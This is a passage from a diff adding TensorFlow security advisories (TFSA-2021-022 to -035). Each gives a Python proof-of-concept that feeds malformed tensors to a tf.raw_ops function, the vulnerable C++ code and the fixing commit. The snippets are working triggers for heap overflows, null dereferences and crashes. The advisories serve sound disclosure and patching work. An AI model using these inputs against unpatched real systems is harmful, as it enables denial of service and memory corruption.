tf.raw_ops.RaggedCross(ragged_values=ragged_values,
ragged_row_splits=ragged_row_splits,
sparse_indices=sparse_indices,
sparse_values=sparse_values,
sparse_shape=sparse_shape,
dense_inputs=dense_inputs,
input_order=input_order,
hashed_output=hashed_output,
num_buckets=num_buckets,
hash_key=hash_key,
out_values_type=tf.int64,
out_row_splits_type=tf.int64)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/efea03b38fb8d3b81762237dc85e579cc5fc6e87/tensorflow/core/kernels/ragged_cross_op.cc#L456-L487)
lacks validation for the user supplied arguments:
```cc
int next_ragged = 0;
int next_sparse = 0;
int next_dense = 0;
for (char c : input_order_) {
if (c == 'R') {
TF_RETURN_IF_ERROR(BuildRaggedFeatureReader(
ragged_values_list[next_ragged], ragged_splits_list[next_ragged],
features));
next_ragged++;
} else if (c == 'S') {
TF_RETURN_IF_ERROR(BuildSparseFeatureReader(
sparse_indices_list[next_sparse], sparse_values_list[next_sparse],
batch_size, features));
next_sparse++;
} else if (c == 'D') {
TF_RETURN_IF_ERROR(
BuildDenseFeatureReader(dense_list[next_dense++], features));
}
...
}
```
Each of the above branches call a helper function after accessing array elements
via a `*_list[next_*]` pattern, followed by incrementing the `next_*` index.
However, as there is no validation that the `next_*` values are in the valid
range for the corresponding `*_list` arrays, this results in heap OOB reads.
### Patches
We have patched the issue in GitHub commit
[44b7f486c0143f68b56c34e2d01e146ee445134a](https://github.com/tensorflow/tensorflow/commit/44b7f486c0143f68b56c34e2d01e146ee445134a).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.
@@ -0,0 +1,53 @@
## TFSA-2021-022: `CHECK`-fail in `DrawBoundingBoxes`
### CVE Number
CVE-2021-29533
### Impact
An attacker can trigger a denial of service via a `CHECK` failure by passing an
empty image to `tf.raw_ops.DrawBoundingBoxes`:
```python
import tensorflow as tf
images = tf.fill([53, 0, 48, 1], 0.)
boxes = tf.fill([53, 31, 4], 0.)
boxes = tf.Variable(boxes)
boxes[0, 0, 0].assign(3.90621)
tf.raw_ops.DrawBoundingBoxes(images=images, boxes=boxes)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/ea34a18dc3f5c8d80a40ccca1404f343b5d55f91/tensorflow/core/kernels/image/draw_bounding_box_op.cc#L148-L165)
uses `CHECK_*` assertions instead of `OP_REQUIRES` to validate user controlled
inputs. Whereas `OP_REQUIRES` allows returning an error condition back to the
user, the `CHECK_*` macros result in a crash if the condition is false, similar
to `assert`.
```cc
const int64 max_box_row_clamp = std::min<int64>(max_box_row, height - 1);
...
CHECK_GE(max_box_row_clamp, 0);
```
In this case, `height` is 0 from the `images` input. This results in
`max_box_row_clamp` being negative and the assertion being falsified, followed
by aborting program execution.
### Patches
We have patched the issue in GitHub commit
[b432a38fe0e1b4b904a6c222cbce794c39703e87](https://github.com/tensorflow/tensorflow/commit/b432a38fe0e1b4b904a6c222cbce794c39703e87).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,53 @@
## TFSA-2021-023: Heap buffer overflow in `QuantizedMul`
### CVE Number
CVE-2021-29535
### Impact
An attacker can cause a heap buffer overflow in `QuantizedMul` by passing in
invalid thresholds for the quantization:
```python
import tensorflow as tf
x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8)
y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8)
min_x = tf.constant([], dtype=tf.float32)
max_x = tf.constant([], dtype=tf.float32)
min_y = tf.constant([], dtype=tf.float32)
max_y = tf.constant([], dtype=tf.float32)
tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/87cf4d3ea9949051e50ca3f071fc909538a51cd0/tensorflow/core/kernels/quantized_mul_op.cc#L287-L290)
assumes that the 4 arguments are always valid scalars and tries to access the
numeric value directly:
```cc
const float min_x = context->input(2).flat<float>()(0);
const float max_x = context->input(3).flat<float>()(0);
const float min_y = context->input(4).flat<float>()(0);
const float max_y = context->input(5).flat<float>()(0);
```
However, if any of these tensors is empty, then `.flat<T>()` is an empty buffer
and accessing the element at position 0 results in overflow.
### Patches
We have patched the issue in GitHub commit
[efea03b38fb8d3b81762237dc85e579cc5fc6e87](https://github.com/tensorflow/tensorflow/commit/efea03b38fb8d3b81762237dc85e579cc5fc6e87).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.
@@ -0,0 +1,106 @@
## TFSA-2021-024: `CHECK`-fail in `SparseConcat`
### CVE Number
CVE-2021-29534
### Impact
An attacker can trigger a denial of service via a `CHECK`-fail in
`tf.raw_ops.SparseConcat`:
```python
import tensorflow as tf
import numpy as np
indices_1 = tf.constant([[514, 514], [514, 514]], dtype=tf.int64)
indices_2 = tf.constant([[514, 530], [599, 877]], dtype=tf.int64)
indices = [indices_1, indices_2]
values_1 = tf.zeros([0], dtype=tf.int64)
values_2 = tf.zeros([0], dtype=tf.int64)
values = [values_1, values_2]
shape_1 = tf.constant([442, 514, 514, 515, 606, 347, 943, 61, 2], dtype=tf.int64)
shape_2 = tf.zeros([9], dtype=tf.int64)
shapes = [shape_1, shape_2]
tf.raw_ops.SparseConcat(indices=indices, values=values, shapes=shapes, concat_dim=2)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/b432a38fe0e1b4b904a6c222cbce794c39703e87/tensorflow/core/kernels/sparse_concat_op.cc#L76)
takes the values specified in `shapes[0]` as dimensions for the output shape:
```cc
TensorShape input_shape(shapes[0].vec<int64>());
```
The [`TensorShape`
constructor](https://github.com/tensorflow/tensorflow/blob/6f9896890c4c703ae0a0845394086e2e1e523299/tensorflow/core/framework/tensor_shape.cc#L183-L188)
uses a `CHECK` operation which triggers when
[`InitDims`](https://github.com/tensorflow/tensorflow/blob/6f9896890c4c703ae0a0845394086e2e1e523299/tensorflow/core/framework/tensor_shape.cc#L212-L296)
returns a non-OK status.
```cc
template <class Shape>
TensorShapeBase<Shape>::TensorShapeBase(gtl::ArraySlice<int64> dim_sizes) {
set_tag(REP16);
set_data_type(DT_INVALID);
TF_CHECK_OK(InitDims(dim_sizes));
}
```
In our scenario, this occurs when adding a dimension from the argument results
in overflow:
```cc
template <class Shape>
Status TensorShapeBase<Shape>::InitDims(gtl::ArraySlice<int64> dim_sizes) {
...
Status status = OkStatus();
for (int64 s : dim_sizes) {
status.Update(AddDimWithStatus(internal::SubtleMustCopy(s)));
if (!status.ok()) {
return status;
}
}
}
template <class Shape>
Status TensorShapeBase<Shape>::AddDimWithStatus(int64 size) {
...
int64 new_num_elements;
if (kIsPartial && (num_elements() < 0 || size < 0)) {
new_num_elements = -1;
} else {
new_num_elements = MultiplyWithoutOverflow(num_elements(), size);
if (TF_PREDICT_FALSE(new_num_elements < 0)) {
return errors::Internal("Encountered overflow when multiplying ",
num_elements(), " with ", size,
", result: ", new_num_elements);
}
}
...
}
```
This is a legacy implementation of the constructor and operations should
use `BuildTensorShapeBase` or `AddDimWithStatus` to prevent `CHECK`-failures in
the presence of overflows.
### Patches
We have patched the issue in GitHub commit
[69c68ecbb24dff3fa0e46da0d16c821a2dd22d7c](https://github.com/tensorflow/tensorflow/commit/69c68ecbb24dff3fa0e46da0d16c821a2dd22d7c).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,49 @@
## TFSA-2021-025: Heap buffer overflow in `QuantizedResizeBilinear`
### CVE Number
CVE-2021-29537
### Impact
An attacker can cause a heap buffer overflow in `QuantizedResizeBilinear` by
passing in invalid thresholds for the quantization:
```python
import tensorflow as tf
images = tf.constant([], shape=[0], dtype=tf.qint32)
size = tf.constant([], shape=[0], dtype=tf.int32)
min = tf.constant([], dtype=tf.float32)
max = tf.constant([], dtype=tf.float32)
tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max, align_corners=False, half_pixel_centers=False)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/50711818d2e61ccce012591eeb4fdf93a8496726/tensorflow/core/kernels/quantized_resize_bilinear_op.cc#L705-L706)
assumes that the 2 arguments are always valid scalars and tries to access the
numeric value directly:
```cc
const float in_min = context->input(2).flat<float>()(0);
const float in_max = context->input(3).flat<float>()(0);
```
However, if any of these tensors is empty, then `.flat<T>()` is an empty buffer
and accessing the element at position 0 results in overflow.
### Patches
We have patched the issue in GitHub commit
[f6c40f0c6cbf00d46c7717a26419f2062f2f8694](https://github.com/tensorflow/tensorflow/commit/f6c40f0c6cbf00d46c7717a26419f2062f2f8694).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.
@@ -0,0 +1,53 @@
## TFSA-2021-026: Heap buffer overflow in `QuantizedReshape`
### CVE Number
CVE-2021-29536
### Impact
An attacker can cause a heap buffer overflow in `QuantizedReshape` by
passing in invalid thresholds for the quantization:
```python
import tensorflow as tf
tensor = tf.constant([], dtype=tf.qint32)
shape = tf.constant([], dtype=tf.int32)
input_min = tf.constant([], dtype=tf.float32)
input_max = tf.constant([], dtype=tf.float32)
tf.raw_ops.QuantizedReshape(tensor=tensor, shape=shape, input_min=input_min, input_max=input_max)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/a324ac84e573fba362a5e53d4e74d5de6729933e/tensorflow/core/kernels/quantized_reshape_op.cc#L38-L55)
assumes that the 2 arguments are always valid scalars and tries to access the
numeric value directly:
```cc
const auto& input_min_float_tensor = ctx->input(2);
...
const float input_min_float = input_min_float_tensor.flat<float>()(0);
const auto& input_max_float_tensor = ctx->input(3);
...
const float input_max_float = input_max_float_tensor.flat<float>()(0);
```
However, if any of these tensors is empty, then `.flat<T>()` is an empty buffer
and accessing the element at position 0 results in overflow.
### Patches
We have patched the issue in GitHub commit
[a324ac84e573fba362a5e53d4e74d5de6729933e](https://github.com/tensorflow/tensorflow/commit/a324ac84e573fba362a5e53d4e74d5de6729933e).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.
@@ -0,0 +1,62 @@
## TFSA-2021-027: Division by zero in `Conv2DBackpropFilter`
### CVE Number
CVE-2021-29538
### Impact
An attacker can cause a division by zero to occur in `Conv2DBackpropFilter`:
```python
import tensorflow as tf
input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
filter_sizes = tf.constant([0, 0, 0, 0], shape=[4], dtype=tf.int32)
out_backprop = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
tf.raw_ops.Conv2DBackpropFilter(
input=input_tensor,
filter_sizes=filter_sizes,
out_backprop=out_backprop,
strides=[1, 1, 1, 1],
use_cudnn_on_gpu=False,
padding='SAME',
explicit_paddings=[],
data_format='NHWC',
dilations=[1, 1, 1, 1]
)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/1b0296c3b8dd9bd948f924aa8cd62f87dbb7c3da/tensorflow/core/kernels/conv_grad_filter_ops.cc#L513-L522)
computes a divisor based on user provided data (i.e., the shape of the tensors
given as arguments):
```cc
const size_t size_A = output_image_size * filter_total_size;
const size_t size_B = output_image_size * dims.out_depth;
const size_t size_C = filter_total_size * dims.out_depth;
const size_t work_unit_size = size_A + size_B + size_C;
const size_t shard_size = (target_working_set_size + work_unit_size - 1) / work_unit_size;
```
If all shapes are empty then `work_unit_size` is 0. Since there is no check for
this case before division, this results in a runtime exception, with potential
to be abused for a denial of service.
### Patches
We have patched the issue in GitHub commit
[c570e2ecfc822941335ad48f6e10df4e21f11c96](https://github.com/tensorflow/tensorflow/commit/c570e2ecfc822941335ad48f6e10df4e21f11c96).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,76 @@
## TFSA-2021-028: Heap buffer overflow in `Conv2DBackpropFilter`
### CVE Number
CVE-2021-29540
### Impact
An attacker can cause a heap buffer overflow to occur in `Conv2DBackpropFilter`:
```python
import tensorflow as tf
input_tensor = tf.constant([386.078431372549, 386.07843139643234],
shape=[1, 1, 1, 2], dtype=tf.float32)
filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32)
out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1],
dtype=tf.float32)
tf.raw_ops.Conv2DBackpropFilter(
input=input_tensor,
filter_sizes=filter_sizes,
out_backprop=out_backprop,
strides=[1, 66, 49, 1],
use_cudnn_on_gpu=True,
padding='VALID',
explicit_paddings=[],
data_format='NHWC',
dilations=[1, 1, 1, 1]
)
```
Alternatively, passing empty tensors also results in similar behavior:
```python
import tensorflow as tf
input_tensor = tf.constant([], shape=[0, 1, 1, 5], dtype=tf.float32)
filter_sizes = tf.constant([3, 8, 1, 1], shape=[4], dtype=tf.int32)
out_backprop = tf.constant([], shape=[0, 1, 1, 1], dtype=tf.float32)
tf.raw_ops.Conv2DBackpropFilter(
input=input_tensor,
filter_sizes=filter_sizes,
out_backprop=out_backprop,
strides=[1, 66, 49, 1],
use_cudnn_on_gpu=True,
padding='VALID',
explicit_paddings=[],
data_format='NHWC',
dilations=[1, 1, 1, 1]
)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/1b0296c3b8dd9bd948f924aa8cd62f87dbb7c3da/tensorflow/core/kernels/conv_grad_filter_ops.cc#L495-L497)
computes the size of the filter tensor but does not validate that it matches the
number of elements in `filter_sizes`. Later, when reading/writing to this
buffer, code uses the value computed here, instead of the number of elements in
the tensor.
### Patches
We have patched the issue in GitHub commit
[c570e2ecfc822941335ad48f6e10df4e21f11c96](https://github.com/tensorflow/tensorflow/commit/c570e2ecfc822941335ad48f6e10df4e21f11c96).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,91 @@
## TFSA-2021-029: Heap buffer overflow in `StringNGrams`
### CVE Number
CVE-2021-29542
### Impact
An attacker can cause a heap buffer overflow by passing crafted inputs to
`tf.raw_ops.StringNGrams`:
```python
import tensorflow as tf
separator = b'\x02\x00'
ngram_widths = [7, 6, 11]
left_pad = b'\x7f\x7f\x7f\x7f\x7f'
right_pad = b'\x7f\x7f\x25\x5d\x53\x74'
pad_width = 50
preserve_short_sequences = True
l = ['', '', '', '', '', '', '', '', '', '', '']
data = tf.constant(l, shape=[11], dtype=tf.string)
l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 3]
data_splits = tf.constant(l2, shape=[116], dtype=tf.int64)
out = tf.raw_ops.StringNGrams(data=data,
data_splits=data_splits, separator=separator,
ngram_widths=ngram_widths, left_pad=left_pad,
right_pad=right_pad, pad_width=pad_width,
preserve_short_sequences=preserve_short_sequences)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/1cdd4da14282210cc759e468d9781741ac7d01bf/tensorflow/core/kernels/string_ngrams_op.cc#L171-L185)
fails to consider corner cases where input would be split in such a way that the
generated tokens should only contain padding elements:
```cc
for (int ngram_index = 0; ngram_index < num_ngrams; ++ngram_index) {
int pad_width = get_pad_width(ngram_width);
int left_padding = std::max(0, pad_width - ngram_index);
int right_padding = std::max(0, pad_width - (num_ngrams - (ngram_index + 1)));
int num_tokens = ngram_width - (left_padding + right_padding);
int data_start_index = left_padding > 0 ? 0 : ngram_index - pad_width;
...
tstring* ngram = &output[ngram_index];
ngram->reserve(ngram_size);
for (int n = 0; n < left_padding; ++n) {
ngram->append(left_pad_);
ngram->append(separator_);
}
for (int n = 0; n < num_tokens - 1; ++n) {
ngram->append(data[data_start_index + n]);
ngram->append(separator_);
}
ngram->append(data[data_start_index + num_tokens - 1]); // <<<
for (int n = 0; n < right_padding; ++n) {
ngram->append(separator_);
ngram->append(right_pad_);
}
...
}
```
If input is such that `num_tokens` is 0, then, for `data_start_index=0` (when
left padding is present), the marked line would result in reading `data[-1]`.
### Patches
We have patched the issue in GitHub commit
[ba424dd8f16f7110eea526a8086f1a155f14f22b](https://github.com/tensorflow/tensorflow/commit/ba424dd8f16f7110eea526a8086f1a155f14f22b).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,50 @@
## TFSA-2021-030: Null pointer dereference in `StringNGrams`
### CVE Number
CVE-2021-29541
### Impact
An attacker can trigger a dereference of a null pointer in
`tf.raw_ops.StringNGrams`:
```python
import tensorflow as tf
data=tf.constant([''] * 11, shape=[11], dtype=tf.string)
splits = [0]*115
splits.append(3)
data_splits=tf.constant(splits, shape=[116], dtype=tf.int64)
tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=b'Ss',
ngram_widths=[7,6,11],
left_pad='ABCDE', right_pad=b'ZYXWVU',
pad_width=50, preserve_short_sequences=True)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/1cdd4da14282210cc759e468d9781741ac7d01bf/tensorflow/core/kernels/string_ngrams_op.cc#L67-L74)
does not fully validate the `data_splits` argument. This would result in
[`ngrams_data`](https://github.com/tensorflow/tensorflow/blob/1cdd4da14282210cc759e468d9781741ac7d01bf/tensorflow/core/kernels/string_ngrams_op.cc#L106-L110)
to be a null pointer when the output would be computed to have 0 or negative
size.
Later writes to the output tensor would then cause a null pointer dereference.
### Patches
We have patched the issue in GitHub commit
[ba424dd8f16f7110eea526a8086f1a155f14f22b](https://github.com/tensorflow/tensorflow/commit/ba424dd8f16f7110eea526a8086f1a155f14f22b).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,65 @@
## TFSA-2021-031: `CHECK`-fail in `QuantizeAndDequantizeV4Grad`
### CVE Number
CVE-2021-29544
### Impact
An attacker can trigger a denial of service via a `CHECK`-fail in
`tf.raw_ops.QuantizeAndDequantizeV4Grad`:
```python
import tensorflow as tf
gradient_tensor = tf.constant([0.0], shape=[1])
input_tensor = tf.constant([0.0], shape=[1])
input_min = tf.constant([[0.0]], shape=[1, 1])
input_max = tf.constant([[0.0]], shape=[1, 1])
tf.raw_ops.QuantizeAndDequantizeV4Grad(
gradients=gradient_tensor, input=input_tensor,
input_min=input_min, input_max=input_max, axis=0)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/95078c145b5a7a43ee046144005f733092756ab5/tensorflow/core/kernels/quantize_and_dequantize_op.cc#L162-L163)
does not validate the rank of the `input_*` tensors. In turn, this results in
the tensors being passes as they are to
[`QuantizeAndDequantizePerChannelGradientImpl`](https://github.com/tensorflow/tensorflow/blob/95078c145b5a7a43ee046144005f733092756ab5/tensorflow/core/kernels/quantize_and_dequantize_op.h#L295-L306):
```cc
template <typename Device, typename T>
struct QuantizeAndDequantizePerChannelGradientImpl {
static void Compute(const Device& d,
typename TTypes<T, 3>::ConstTensor gradient,
typename TTypes<T, 3>::ConstTensor input,
const Tensor* input_min_tensor,
const Tensor* input_max_tensor,
typename TTypes<T, 3>::Tensor input_backprop,
typename TTypes<T>::Flat input_min_backprop,
typename TTypes<T>::Flat input_max_backprop) {
...
auto input_min = input_min_tensor->vec<T>();
auto input_max = input_max_tensor->vec<T>();
...
}
```
However, the `vec<T>` method, requires the rank to 1 and triggers a `CHECK`
failure otherwise.
### Patches
We have patched the issue in GitHub commit
[20431e9044cf2ad3c0323c34888b192f3289af6b](https://github.com/tensorflow/tensorflow/commit/20431e9044cf2ad3c0323c34888b192f3289af6b).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2 as this is the only other affected version.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,42 @@
## TFSA-2021-032: `CHECK`-fail in `CTCGreedyDecoder`
### CVE Number
CVE-2021-29543
### Impact
An attacker can trigger a denial of service via a `CHECK`-fail in
`tf.raw_ops.CTCGreedyDecoder`:
```python
import tensorflow as tf
inputs = tf.constant([], shape=[18, 2, 0], dtype=tf.float32)
sequence_length = tf.constant([-100, 17], shape=[2], dtype=tf.int32)
merge_repeated = False
tf.raw_ops.CTCGreedyDecoder(inputs=inputs, sequence_length=sequence_length, merge_repeated=merge_repeated)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/1615440b17b364b875eb06f43d087381f1460a65/tensorflow/core/kernels/ctc_decoder_ops.cc#L37-L50)
has a `CHECK_LT` inserted to validate some invariants. When this condition is
false, the program aborts, instead of returning a valid error to the user. This
abnormal termination can be weaponized in denial of service attacks.
### Patches
We have patched the issue in GitHub commit
[ea3b43e98c32c97b35d52b4c66f9107452ca8fb2](https://github.com/tensorflow/tensorflow/commit/ea3b43e98c32c97b35d52b4c66f9107452ca8fb2).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,54 @@
## TFSA-2021-033: Heap buffer overflow in `SparseTensorToCSRSparseMatrix`
### CVE Number
CVE-2021-29545
### Impact
An attacker can trigger a denial of service via a `CHECK`-fail in
converting sparse tensors to CSR Sparse matrices:
```python
import tensorflow as tf
import numpy as np
from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops
indices_array = np.array([[0, 0]])
value_array = np.array([0.0], dtype=np.float32)
dense_shape = [0, 0]
st = tf.SparseTensor(indices_array, value_array, dense_shape)
values_tensor = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix(
st.indices, st.values, st.dense_shape)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/800346f2c03a27e182dd4fba48295f65e7790739/tensorflow/core/kernels/sparse/kernels.cc#L66)
does a double redirection to access an element of an array allocated on the
heap:
```cc
csr_row_ptr(indices(i, 0) + 1) += 1;
```
If the value at `indices(i, 0)` is such that `indices(i, 0) + 1` is outside the
bounds of `csr_row_ptr`, this results in writing outside of bounds of heap
allocated data.
### Patches
We have patched the issue in GitHub commit
[1e922ccdf6bf46a3a52641f99fd47d54c1decd13](https://github.com/tensorflow/tensorflow/commit/1e922ccdf6bf46a3a52641f99fd47d54c1decd13).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,65 @@
## TFSA-2021-034: Division by 0 in `QuantizedBiasAdd`
### CVE Number
CVE-2021-29546
### Impact
An attacker can trigger an integer division by zero undefined behavior in
`tf.raw_ops.QuantizedBiasAdd`:
```python
import tensorflow as tf
input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8)
bias = tf.constant([], shape=[0], dtype=tf.quint8)
min_input = tf.constant(-10.0, dtype=tf.float32)
max_input = tf.constant(-10.0, dtype=tf.float32)
min_bias = tf.constant(-10.0, dtype=tf.float32)
max_bias = tf.constant(-10.0, dtype=tf.float32)
tf.raw_ops.QuantizedBiasAdd(input=input_tensor, bias=bias, min_input=min_input,
max_input=max_input, min_bias=min_bias,
max_bias=max_bias, out_type=tf.qint32)
```
This is because the [implementation of the Eigen
kernel](https://github.com/tensorflow/tensorflow/blob/61bca8bd5ba8a68b2d97435ddfafcdf2b85672cd/tensorflow/core/kernels/quantization_utils.h#L812-L849)
does a division by the number of elements of the smaller input (based on shape)
without checking that this is not zero:
```cc
template <typename T1, typename T2, typename T3>
void QuantizedAddUsingEigen(const Eigen::ThreadPoolDevice& device,
const Tensor& input, float input_min,
float input_max, const Tensor& smaller_input,
float smaller_input_min, float smaller_input_max,
Tensor* output, float* output_min,
float* output_max) {
...
const int64 input_element_count = input.NumElements();
const int64 smaller_input_element_count = smaller_input.NumElements();
...
bcast[0] = input_element_count / smaller_input_element_count;
...
}
```
This integral division by 0 is undefined behavior.
### Patches
We have patched the issue in GitHub commit
[67784700869470d65d5f2ef20aeb5e97c31673cb](https://github.com/tensorflow/tensorflow/commit/67784700869470d65d5f2ef20aeb5e97c31673cb).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,77 @@
## TFSA-2021-035: Heap out of bounds in `QuantizedBatchNormWithGlobalNormalization`
### CVE Number
CVE-2021-29547
### Impact
An attacker can cause a segfault and denial of service via accessing data
outside of bounds in `tf.raw_ops.QuantizedBatchNormWithGlobalNormalization`:
```python
import tensorflow as tf
t = tf.constant([1], shape=[1, 1, 1, 1], dtype=tf.quint8)
t_min = tf.constant([], shape=[0], dtype=tf.float32)
t_max = tf.constant([], shape=[0], dtype=tf.float32)
m = tf.constant([1], shape=[1], dtype=tf.quint8)
m_min = tf.constant([], shape=[0], dtype=tf.float32)
m_max = tf.constant([], shape=[0], dtype=tf.float32)
v = tf.constant([1], shape=[1], dtype=tf.quint8)
